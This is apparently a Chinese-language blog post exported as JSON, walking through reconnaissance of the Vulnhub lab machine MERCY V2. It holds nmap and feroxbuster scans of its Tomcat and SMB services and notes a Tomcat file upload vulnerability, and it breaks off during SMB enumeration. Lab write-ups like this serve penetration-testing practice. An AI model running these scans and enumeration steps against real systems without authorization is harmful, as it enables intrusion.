{"id":462,"date":"2024-03-25T14:01:36","date_gmt":"2024-03-25T06:01:36","guid":{"rendered":"http:\/\/162.14.82.114\/?p=462"},"modified":"2024-03-25T14:01:36","modified_gmt":"2024-03-25T06:01:36","slug":"vulnhub-digitalworld-local-mercy-v2","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/462\/03\/25\/2024\/","title":{"rendered":"Vulnhub&#8211;DIGITALWORLD.LOCAL: MERCY V2"},"content":{"rendered":"<h1>DIGITALWORLD.LOCAL: MERCY V2<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401760.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401760.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240324122938725\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401763.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401763.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240325120829697\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<p>\u626b\u63cf\u4e00\u4e0b\u7aef\u53e3\uff1a<\/p>\n<pre><code class=\"language-bash\">sudo nmap -sS 192.168.37.132<\/code><\/pre>\n<pre><code class=\"language-apl\">PORT     STATE    SERVICE\n22\/tcp   filtered ssh\n53\/tcp   open     domain\n80\/tcp   filtered http\n110\/tcp  open     pop3\n139\/tcp  open     netbios-ssn\n143\/tcp  open     imap\n445\/tcp  open     microsoft-ds\n993\/tcp  open     imaps\n995\/tcp  open     pop3s\n8080\/tcp open     http-proxy\nMAC Address: 00:0C:29:73:16:69 (VMware)<\/code><\/pre>\n<pre><code class=\"language-bash\">nmap -sCV 192.168.37.132<\/code><\/pre>\n<pre><code class=\"language-text\">PORT     STATE SERVICE     VERSION\n53\/tcp   open  domain      ISC BIND 9.9.5-3ubuntu0.17 (Ubuntu Linux)\n| dns-nsid: \n|_  bind.version: 9.9.5-3ubuntu0.17-Ubuntu\n110\/tcp  open  pop3?\n| ssl-cert: Subject: commonName=localhost\/organizationName=Dovecot mail server\n| Not valid before: 2018-08-24T13:22:55\n|_Not valid after:  2028-08-23T13:22:55\n|_ssl-date: TLS randomness does not represent time\n139\/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)\n143\/tcp  open  imap        Dovecot imapd\n| ssl-cert: Subject: commonName=localhost\/organizationName=Dovecot mail server\n| Not valid before: 2018-08-24T13:22:55\n|_Not valid after:  2028-08-23T13:22:55\n|_ssl-date: TLS randomness does not represent time\n445\/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)\n993\/tcp  open  ssl\/imap    Dovecot imapd\n|_ssl-date: TLS randomness does not represent time\n| ssl-cert: Subject: commonName=localhost\/organizationName=Dovecot mail server\n| Not valid before: 2018-08-24T13:22:55\n|_Not valid after:  2028-08-23T13:22:55\n995\/tcp  open  ssl\/pop3s?\n| ssl-cert: Subject: commonName=localhost\/organizationName=Dovecot mail server\n| Not valid before: 2018-08-24T13:22:55\n|_Not valid after:  2028-08-23T13:22:55\n|_ssl-date: TLS randomness does not represent time\n8080\/tcp open  http        Apache Tomcat\/Coyote JSP engine 1.1\n| http-robots.txt: 1 disallowed entry \n|_\/tryharder\/tryharder\n|_http-open-proxy: Proxy might be redirecting requests\n|_http-title: Apache Tomcat\n| http-methods: \n|_  Potentially risky methods: PUT DELETE\n|_http-server-header: Apache-Coyote\/1.1\nService Info: Host: MERCY; OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nHost script results:\n| smb2-time: \n|   date: 2024-03-25T04:12:55\n|_  start_date: N\/A\n| smb-security-mode: \n|   account_used: guest\n|   authentication_level: user\n|   challenge_response: supported\n|_  message_signing: disabled (dangerous, but default)\n|_nbstat: NetBIOS name: MERCY, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: &lt;unknown&gt; (unknown)\n| smb2-security-mode: \n|   3:1:1: \n|_    Message signing enabled but not required\n| smb-os-discovery: \n|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)\n|   Computer name: mercy\n|   NetBIOS computer name: MERCY\\x00\n|   Domain name: \\x00\n|   FQDN: mercy\n|_  System time: 2024-03-25T12:12:55+08:00\n|_clock-skew: mean: -2h39m59s, deviation: 4h37m07s, median: 0s<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code>feroxbuster -u http:\/\/192.168.37.132<\/code><\/pre>\n<blockquote>\n<p>=&gt; error sending request for url (<a href=\"http:\/\/192.168.37.132\/\">http:\/\/192.168.37.132\/<\/a>): error trying to connect: tcp connect error: Connection refused (os error 111)                                                           ERROR: Could not connect to any target provided <\/p>\n<p>\u8868\u793a\u88ab\u8fc7\u6ee4\u4e86\uff0cnmap\u626b\u63cf\u7ed3\u679c\u4e3a<code>filtered<\/code><\/p>\n<\/blockquote>\n<pre><code class=\"language-bash\">feroxbuster -u http:\/\/192.168.37.132:8080<\/code><\/pre>\n<pre><code class=\"language-text\">404      GET        1l       46w      989c http:\/\/192.168.37.132:8080\/tryharder\/\n200      GET        1l        1w      621c http:\/\/192.168.37.132:8080\/tryharder\/tryharder\n404      GET        1l       46w        -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/docs =&gt; http:\/\/192.168.37.132:8080\/docs\/\n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/manager =&gt; http:\/\/192.168.37.132:8080\/manager\/\n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/examples =&gt; http:\/\/192.168.37.132:8080\/examples\/\n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/docs\/images =&gt; http:\/\/192.168.37.132:8080\/docs\/images\/\n401      GET       64l      289w     2474c http:\/\/192.168.37.132:8080\/manager\/html\n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/docs\/config =&gt; http:\/\/192.168.37.132:8080\/docs\/config\/\n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/docs\/api =&gt; http:\/\/192.168.37.132:8080\/docs\/api\/\n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/examples\/jsp =&gt; http:\/\/192.168.37.132:8080\/examples\/jsp\/\n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/examples\/jsp\/include =&gt; http:\/\/192.168.37.132:8080\/examples\/jsp\/include\/\n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/examples\/jsp\/error =&gt; http:\/\/192.168.37.132:8080\/examples\/jsp\/error\/\n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/examples\/jsp\/images =&gt; http:\/\/192.168.37.132:8080\/examples\/jsp\/images\/\n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/examples\/jsp\/xml =&gt; http:\/\/192.168.37.132:8080\/examples\/jsp\/xml\/\n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/examples\/jsp\/chat =&gt; http:\/\/192.168.37.132:8080\/examples\/jsp\/chat\/\n[&gt;-------------------] - 3s      6511\/390008  3m      found:15      errors:0      \n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/examples\/servlets =&gt; http:\/\/192.168.37.132:8080\/examples\/servlets\/\n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/examples\/jsp\/plugin =&gt; http:\/\/192.168.37.132:8080\/examples\/jsp\/plugin\/\n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/examples\/jsp\/forward =&gt; http:\/\/192.168.37.132:8080\/examples\/jsp\/forward\/\n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/examples\/servlets\/images =&gt; http:\/\/192.168.37.132:8080\/examples\/servlets\/images\/\n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/examples\/jsp\/security =&gt; http:\/\/192.168.37.132:8080\/examples\/jsp\/security\/\n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/examples\/jsp\/sessions =&gt; http:\/\/192.168.37.132:8080\/examples\/jsp\/sessions\/\n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/host-manager\/ =&gt; http:\/\/192.168.37.132:8080\/host-manager\/html\n401      GET       54l      241w     2044c http:\/\/192.168.37.132:8080\/host-manager\/html\n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/manager\/ =&gt; http:\/\/192.168.37.132:8080\/manager\/html\n200      GET       29l      211w     1895c http:\/\/192.168.37.132:8080\/\n404      GET       46l      184w        -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/examples\/jsp\/cal =&gt; http:\/\/192.168.37.132:8080\/examples\/jsp\/cal\/\n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/manager\/images =&gt; http:\/\/192.168.37.132:8080\/manager\/images\/\n401      GET       64l      289w     2474c http:\/\/192.168.37.132:8080\/manager\/text\/\n401      GET       64l      289w     2474c http:\/\/192.168.37.132:8080\/manager\/text\/css\n200      GET        5l       27w      288c http:\/\/192.168.37.132:8080\/examples\/jsp\/chat\/chat\n401      GET       64l      289w     2474c http:\/\/192.168.37.132:8080\/manager\/text\n401      GET       64l      289w     2474c http:\/\/192.168.37.132:8080\/manager\/status\n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/examples\/jsp\/colors =&gt; http:\/\/192.168.37.132:8080\/examples\/jsp\/colors\/\n404      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/manager\/accounts\n404      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/manager\/unused\n404      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/manager\/tree\n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/examples\/jsp\/plugin\/applet =&gt; http:\/\/192.168.37.132:8080\/examples\/jsp\/plugin\/applet\/\n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/examples\/jsp\/async =&gt; http:\/\/192.168.37.132:8080\/examples\/jsp\/async\/\n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/docs\/architecture =&gt; http:\/\/192.168.37.132:8080\/docs\/architecture\/\n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/examples\/jsp\/dates =&gt; http:\/\/192.168.37.132:8080\/examples\/jsp\/dates\/\n200      GET       10l       19w      221c http:\/\/192.168.37.132:8080\/examples\/jsp\/j_security_check\n200      GET       10l       19w      221c http:\/\/192.168.37.132:8080\/examples\/servlets\/j_security_check\n200      GET       10l       19w      221c http:\/\/192.168.37.132:8080\/examples\/j_security_check\n200      GET       10l       19w      221c http:\/\/192.168.37.132:8080\/examples\/jsp\/error\/j_security_check\n200      GET       10l       19w      221c http:\/\/192.168.37.132:8080\/examples\/jsp\/images\/j_security_check\n200      GET       10l       19w      221c http:\/\/192.168.37.132:8080\/examples\/servlets\/images\/j_security_check\n200      GET       10l       19w      221c http:\/\/192.168.37.132:8080\/examples\/jsp\/plugin\/j_security_check\n200      GET       10l       19w      221c http:\/\/192.168.37.132:8080\/examples\/jsp\/security\/j_security_check\n200      GET       10l       19w      221c http:\/\/192.168.37.132:8080\/examples\/jsp\/xml\/j_security_check\n401      GET       64l      289w     2474c http:\/\/192.168.37.132:8080\/manager\/j_security_check\n200      GET       10l       19w      221c http:\/\/192.168.37.132:8080\/examples\/jsp\/forward\/j_security_check\n200      GET       10l       19w      221c http:\/\/192.168.37.132:8080\/examples\/jsp\/include\/j_security_check\n200      GET       10l       19w      221c http:\/\/192.168.37.132:8080\/examples\/jsp\/sessions\/j_security_check\n200      GET       10l       19w      221c http:\/\/192.168.37.132:8080\/examples\/jsp\/cal\/j_security_check\n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/examples\/jsp\/chat\/index.jsp;jsessionid=D8AF0618B91EF30D5FF0FD4BAFEB9293 =&gt; http:\/\/192.168.37.132:8080\/examples\/jsp\/chat\/login.jsp\n200      GET       10l       19w      221c http:\/\/192.168.37.132:8080\/examples\/jsp\/chat\/j_security_check\n401      GET       64l      289w     2474c http:\/\/192.168.37.132:8080\/manager\/images\/j_security_check\n200      GET       10l       19w      221c http:\/\/192.168.37.132:8080\/examples\/jsp\/colors\/j_security_check\n404      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/manager\/ris\n200      GET       54l      198w     1689c http:\/\/192.168.37.132:8080\/examples\/jsp\/async\/index.jsp;jsessionid=0C7E29C0E0D37A8DB17EC652DB97EE01\n200      GET       10l       19w      221c http:\/\/192.168.37.132:8080\/examples\/jsp\/async\/j_security_check\n404      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/manager\/images\/TWiki\n200      GET       10l       19w      221c http:\/\/192.168.37.132:8080\/examples\/jsp\/dates\/j_security_check\n404      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/manager\/images\/how-to-order\n404      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/manager\/images\/BTrivia\n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/docs\/architecture\/startup =&gt; http:\/\/192.168.37.132:8080\/docs\/architecture\/startup\/<\/code><\/pre>\n<p>\u5229\u7528awk\u8fdb\u884c\u8fc7\u6ee4\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-shell\">awk &#039;{print $1, $6}&#039; temp<\/code><\/pre>\n<pre><code class=\"language-text\">404 http:\/\/192.168.37.132:8080\/tryharder\/\n200 http:\/\/192.168.37.132:8080\/tryharder\/tryharder\n302 http:\/\/192.168.37.132:8080\/docs\n302 http:\/\/192.168.37.132:8080\/manager\n302 http:\/\/192.168.37.132:8080\/examples\n302 http:\/\/192.168.37.132:8080\/docs\/images\n401 http:\/\/192.168.37.132:8080\/manager\/html\n302 http:\/\/192.168.37.132:8080\/docs\/config\n302 http:\/\/192.168.37.132:8080\/docs\/api\n302 http:\/\/192.168.37.132:8080\/examples\/jsp\n302 http:\/\/192.168.37.132:8080\/examples\/jsp\/include\n302 http:\/\/192.168.37.132:8080\/examples\/jsp\/error\n302 http:\/\/192.168.37.132:8080\/examples\/jsp\/images\n302 http:\/\/192.168.37.132:8080\/examples\/jsp\/xml\n302 http:\/\/192.168.37.132:8080\/examples\/jsp\/chat\n302 http:\/\/192.168.37.132:8080\/examples\/servlets\n302 http:\/\/192.168.37.132:8080\/examples\/jsp\/plugin\n302 http:\/\/192.168.37.132:8080\/examples\/jsp\/forward\n302 http:\/\/192.168.37.132:8080\/examples\/servlets\/images\n302 http:\/\/192.168.37.132:8080\/examples\/jsp\/security\n302 http:\/\/192.168.37.132:8080\/examples\/jsp\/sessions\n302 http:\/\/192.168.37.132:8080\/host-manager\/\n401 http:\/\/192.168.37.132:8080\/host-manager\/html\n302 http:\/\/192.168.37.132:8080\/manager\/\n200 http:\/\/192.168.37.132:8080\/\n302 http:\/\/192.168.37.132:8080\/examples\/jsp\/cal\n302 http:\/\/192.168.37.132:8080\/manager\/images\n401 http:\/\/192.168.37.132:8080\/manager\/text\/\n401 http:\/\/192.168.37.132:8080\/manager\/text\/css\n200 http:\/\/192.168.37.132:8080\/examples\/jsp\/chat\/chat\n401 http:\/\/192.168.37.132:8080\/manager\/text\n401 http:\/\/192.168.37.132:8080\/manager\/status\n302 http:\/\/192.168.37.132:8080\/examples\/jsp\/colors\n404 http:\/\/192.168.37.132:8080\/manager\/accounts\n404 http:\/\/192.168.37.132:8080\/manager\/unused\n404 http:\/\/192.168.37.132:8080\/manager\/tree\n302 http:\/\/192.168.37.132:8080\/examples\/jsp\/plugin\/applet\n302 http:\/\/192.168.37.132:8080\/examples\/jsp\/async\n302 http:\/\/192.168.37.132:8080\/docs\/architecture\n302 http:\/\/192.168.37.132:8080\/examples\/jsp\/dates\n200 http:\/\/192.168.37.132:8080\/examples\/jsp\/j_security_check\n200 http:\/\/192.168.37.132:8080\/examples\/servlets\/j_security_check\n200 http:\/\/192.168.37.132:8080\/examples\/j_security_check\n200 http:\/\/192.168.37.132:8080\/examples\/jsp\/error\/j_security_check\n200 http:\/\/192.168.37.132:8080\/examples\/jsp\/images\/j_security_check\n200 http:\/\/192.168.37.132:8080\/examples\/servlets\/images\/j_security_check\n200 http:\/\/192.168.37.132:8080\/examples\/jsp\/plugin\/j_security_check\n200 http:\/\/192.168.37.132:8080\/examples\/jsp\/security\/j_security_check\n200 http:\/\/192.168.37.132:8080\/examples\/jsp\/xml\/j_security_check\n401 http:\/\/192.168.37.132:8080\/manager\/j_security_check\n200 http:\/\/192.168.37.132:8080\/examples\/jsp\/forward\/j_security_check\n200 http:\/\/192.168.37.132:8080\/examples\/jsp\/include\/j_security_check\n200 http:\/\/192.168.37.132:8080\/examples\/jsp\/sessions\/j_security_check\n200 http:\/\/192.168.37.132:8080\/examples\/jsp\/cal\/j_security_check\n302 http:\/\/192.168.37.132:8080\/examples\/jsp\/chat\/index.jsp;jsessionid=D8AF0618B91EF30D5FF0FD4BAFEB9293\n200 http:\/\/192.168.37.132:8080\/examples\/jsp\/chat\/j_security_check\n401 http:\/\/192.168.37.132:8080\/manager\/images\/j_security_check\n200 http:\/\/192.168.37.132:8080\/examples\/jsp\/colors\/j_security_check\n404 http:\/\/192.168.37.132:8080\/manager\/ris\n200 http:\/\/192.168.37.132:8080\/examples\/jsp\/async\/index.jsp;jsessionid=0C7E29C0E0D37A8DB17EC652DB97EE01\n200 http:\/\/192.168.37.132:8080\/examples\/jsp\/async\/j_security_check\n404 http:\/\/192.168.37.132:8080\/manager\/images\/TWiki\n200 http:\/\/192.168.37.132:8080\/examples\/jsp\/dates\/j_security_check\n404 http:\/\/192.168.37.132:8080\/manager\/images\/how-to-order\n404 http:\/\/192.168.37.132:8080\/manager\/images\/BTrivia\n302 http:\/\/192.168.37.132:8080\/docs\/architecture\/startup<\/code><\/pre>\n<p>\u9875\u9762\u5185\u5bb9\u5982\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401764.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401764.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240325121824227\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u6f0f\u6d1e\u5229\u7528<\/h2>\n<h3>\u654f\u611f\u76ee\u5f55\u53d1\u6398<\/h3>\n<p>\u6839\u636e\u4e3b\u9875\u4e0a\u7684\u5730\u5740\uff0c\u5c1d\u8bd5\u8bbf\u95ee\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401766.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401766.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240325123217162\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401767.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401767.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240325123354703\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401768.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401768.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240325123435438\" \/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401769.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401769.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240325123449030\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h4>\u6f0f\u6d1e\u4fe1\u606f\u641c\u96c6<\/h4>\n<p>\u53d1\u73b0<code>tomcat<\/code>\u7248\u672c<code>7.0.52<\/code>\uff0c\u5c1d\u8bd5\u4e00\u4e0b\u662f\u5426\u6709\u76f8\u5173\u6f0f\u6d1e\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401770.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401770.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240325123630137\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53d1\u73b0\u4e00\u4e2a\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e\uff0c\u53ef\u80fd\u7b49\u4e00\u4e0b\u53ef\u4ee5\u7528\u5230\uff0c\u5148\u770b\u770b\u522b\u7684\u3002<\/p>\n<h3>\u7aef\u53e3\u4fe1\u606f\u641c\u96c6<\/h3>\n<h4>SMB\u670d\u52a1\u6536\u96c6<\/h4>\n<p>\u53d1\u73b0\u5f00\u542f\u4e86<code>445<\/code>\u7aef\u53e3\uff0c\u5c1d\u8bd5\u8fdb\u884c\u6536\u96c6\uff1a<\/p>\n<p>\u5148\u62ff<code>enum4linux<\/code>\u626b\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">enum4Linux 192.168.37.132<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401771.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401771.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240325124824854\" style=\"zoom: 50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401772.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401772.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240325124846078\" style=\"zoom: 50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper 